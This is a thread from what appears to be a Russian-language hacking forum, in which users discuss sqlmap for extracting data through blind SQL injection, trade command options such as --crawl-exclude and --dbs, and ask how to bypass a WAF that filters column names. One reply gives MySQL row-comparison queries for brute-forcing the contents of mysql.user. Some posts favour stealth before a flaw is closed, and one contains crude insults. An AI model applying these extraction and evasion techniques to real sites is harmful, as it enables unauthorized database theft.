 |
|
09.12.2018, 20:33
|
|
Познающий
Регистрация: 25.08.2013
Сообщений: 92
С нами:
6692726
Репутация:
3
|
|
artkar. Ты...эт пиздец...
Sqlmap просто необходим, а не ненужен. Если у тебя time - based or boolean based иньекция blind, тебе надо вытянуть скажем хэши админов, в хэше 32 символа, на поиск одного верного символа уходит допустим 3-5 запросов к бд. Неверные символы возвращают ответ через 1 секунду, верный через 2. В базе скажем 5 хэшей. У тебя руками неделя уйдет, еще и сидеть с секундомером в руках. А если хэшей 50, 500, 5 000, 50 000 ~ ? Скажешь, напишешь скрипт? Пиши еще неделю, замусори логи тестами скрипта, пока уязвимость не закроют и не спалят. А тут есть готовый инструмент, это sqlmap. Человеку это физически невозможно сделать руками. Это один из возможных примеров, из сотен возможных.
https://www.owasp.org/index.php/Cate...Scanning_Tools вот тебе список всех актуальных и не очень Web Application Security Scanner's , раз ума не хватает загуглить. Что это и для чего, разбирайся сам. Заметь, среди них нет sqlmap'a. Потому что, бык ты, это не сканер уязвимостей. По ссылке https://vulners.com/search?query=sql...n last 10 days я указал тебе последние найденные уязвимости в "современных" сервисах (проверенных продвинутыми пентестами еще до релиза продукта), которые взламываются с помощью sqlmap. Эксплуатируются им, дебил. А netsparker это адвизор баги блядь, именно в этом случае. Нашли они ее, а эксплуатирует ее sqlmap.
И да, иди на***. Тупой еще и спорить пытается, в чем не соображает нихера. На этом разговор с тобой окончен. |
|
|
25.12.2018, 08:19
|
|
Познающий
Регистрация: 19.07.2011
Сообщений: 94
С нами:
7798646
Репутация:
3
|
|
Как исключить директорию сайта при --crawl ? То есть , допустим , я хочу чекнуть все страницы сайта , кроме страниц из директории forum . Можно ли ее исключить ?
|
|
|
|
25.12.2018, 11:53
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от Lazy
↑
Как исключить директорию сайта при --crawl ? То есть , допустим , я хочу чекнуть все страницы сайта , кроме страниц из директории forum . Можно ли ее исключить ?
--crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout")
|
|
|
|
25.12.2018, 18:39
|
|
Новичок
Регистрация: 10.06.2017
Сообщений: 19
С нами:
4698326
Репутация:
0
|
|
Доброго времени суток постояльцы! Интересен такой вопрос, какие опции дать sqlmap, что бы проверил на уязвимость линк такого формата, без цели после слеша - ( / xxxxx.com/scart/ )? |
|
|
|
25.12.2018, 18:46
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами:
5025206
Репутация:
5
|
|
Сообщение от aZohan
↑
Доброго времени суток постояльцы! Интересен такой вопрос, какие опции дать sqlmap, что бы проверил на уязвимость линк такого формата, без цели после слеша - ( /
xxxxx.com/scart/
)?
--url "link.com/search/*" --dbs
|
|
|
|
25.12.2018, 18:48
|
|
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами:
5713526
Репутация:
145
|
|
|
|
|
|
25.12.2018, 19:07
|
|
Познающий
Регистрация: 12.07.2015
Сообщений: 39
С нами:
5704886
Репутация:
0
|
|
ребят подскажите плз почему я в openfire не могу создать компонент или имя домена с символом _
servercomponent проходит а server_component нет
|
|
|
|
25.12.2018, 20:28
|
|
Новичок
Регистрация: 14.12.2018
Сообщений: 12
С нами:
3903446
Репутация:
4
|
|
Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user
(Где password фильтруется WAF) запрос вида SELECT 0x70617373776F7264 FROM a.user
|
|
|
|
25.12.2018, 21:07
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от xmp
↑
Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user
(Где password фильтруется WAF) запрос вида SELECT 0x66 FROM a.user
"SELECT 0x66 FROM a.user" так не получится, просто заселектиш строку
смотря что за запрос, но это в любом случае отдельный скрипт писать придется
если знаешь количество колонок в a.user то можно что то около того бинарным перебором сделать
Код:
mysql> select 'true' from(select 1)x where 'aocalhost'>'localhost';
Empty set (0.00 sec)
mysql> select 'true' from(select 1)x where 'qocalhost'>'localhost';
+------+
| true |
+------+
| true |
+------+
1 row in set (0.00 sec)
на примере mysql.user, первая колонка в этой таблице "Host"
Код:
mysql> select 'true' from(select 1)x where ('aocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
Empty set (0.01 sec)
mysql> select 'true' from(select 1)x where ('qocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
+------+
| true |
+------+
| true |
+------+
1 row in set (0.01 sec)
|
|
|
|
30.12.2018, 22:05
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами:
5745206
Репутация:
1
|
|
Как сливать базу с конца ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
